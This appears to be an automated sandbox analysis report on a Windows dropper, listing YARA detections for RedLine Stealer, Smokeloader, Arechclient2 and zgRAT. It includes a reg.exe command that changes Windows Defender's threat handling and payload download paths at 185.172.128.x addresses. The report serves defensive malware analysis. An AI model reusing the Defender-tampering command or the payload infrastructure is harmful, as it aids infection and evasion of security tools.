Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D3EA80	8_2_68D3EA80
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D3CA70	8_2_68D3CA70
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D6EA00	8_2_68D6EA00
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D78A30	8_2_68D78A30
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68DC6BE0	8_2_68DC6BE0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D60BA0	8_2_68D60BA0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D1ECD0	8_2_68D1ECD0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68CBECC0	8_2_68CBECC0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68CCAC60	8_2_68CCAC60
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D86C00	8_2_68D86C00
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C7F840	11_2_00C7F840
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C64060	11_2_00C64060
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C7B150	11_2_00C7B150
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C62120	11_2_00C62120
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C86130	11_2_00C86130
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00CACAA0	11_2_00CACAA0
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00CB9A00	11_2_00CB9A00
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C74390	11_2_00C74390
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C80390	11_2_00C80390
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C8FC10	11_2_00C8FC10
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00CB5550	11_2_00CB5550
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C6D570	11_2_00C6D570
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00CB96E0	11_2_00CB96E0
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C6A6F0	11_2_00C6A6F0
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C866F0	11_2_00C866F0
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C637B0	11_2_00C637B0
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68B3D24D	11_2_68B3D24D
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68BC4D8F	11_2_68BC4D8F
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68BC3D16	11_2_68BC3D16
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68BD371C	11_2_68BD371C

Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: String function: 05C91BE3 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: String function: 05C936F8 appears 184 times
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: String function: 05CB7A73 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: String function: 05C99F27 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: String function: 0042780C appears 44 times
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: String function: 05C91D46 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: String function: 00C614F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: String function: 00C61900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: String function: 00C61310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: String function: 68BC4701 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: String function: 00C61930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: String function: 00DE9D36 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: String function: 68BC6320 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: String function: 68E409D0 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: String function: 68C4CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: String function: 68C594D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: String function: 004043B0 appears 316 times

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3808 -ip 3808

Source: file.exe, 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameinetc.dllF vs file.exe
Source: file.exe, 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameinetc.dllF vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

Source: 11.2.run.exe.426ed5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.cmd.exe.4fdce64.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.cmd.exe.58700c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 72.2.run.exe.336586d.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 72.2.run.exe.33a915b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.cmd.exe.4fdc264.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.cmd.exe.58700c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 72.2.run.exe.33a9d5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.cmd.exe.4f98976.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 69.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 11.2.run.exe.426e15b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.run.exe.422a86d.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.2693695310.0000000004095000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2983285998.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\wygmbcpqogng, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: forfiles.exe, 00000023.00000002.2635684933.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@176/111@23/17

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Code function: 8_2_68C77030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

8_2_68C77030

Source: C:\Users\user\Desktop\file.exe

0_2_00403532

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049C7

Source: C:\Users\user\AppData\Local\Temp\i1.exe

Code function: 6_2_040963B6 CreateToolhelp32Snapshot,Module32First,

6_2_040963B6

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe

Code function: 11_2_00C78040 LoadResource,LockResource,SizeofResource,

11_2_00C78040

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\load[1].bat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Mutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3808
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:768:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\nsvE79B.tmp

Jump to behavior

Source: Yara match	File source: 15.0.u2xs.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2324296887.0000000000401000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2342660108.00000000070AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat"

Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: one	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: one	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: one	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.90	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.90	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.90	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: Installed	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: Installed	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.59	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.59	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.203	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.203	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /syncUpd.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /syncUpd.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /timeSync.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /timeSync.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.203	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.59	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /timeSync.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /syncUpd.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /1/Package.zip	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /1/Package.zip	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /1/Package.zip	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .zip	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .zip	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: \run.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: \run.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /BroomSetup.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /BroomSetup.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /BroomSetup.exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .exe	6_2_00424A0E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: @	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.90	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.90	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.90	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: Installed	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: Installed	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.59	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.59	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.203	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.203	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /syncUpd.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /syncUpd.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /timeSync.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /timeSync.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.203	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.59	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /timeSync.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /syncUpd.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /1/Package.zip	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /1/Package.zip	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /1/Package.zip	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .zip	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .zip	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: \run.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: \run.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /BroomSetup.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /BroomSetup.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: 185.172.128.228	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: /BroomSetup.exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .exe	6_2_05CB4C75
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Command line argument: .exe	6_2_05CB4C75

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
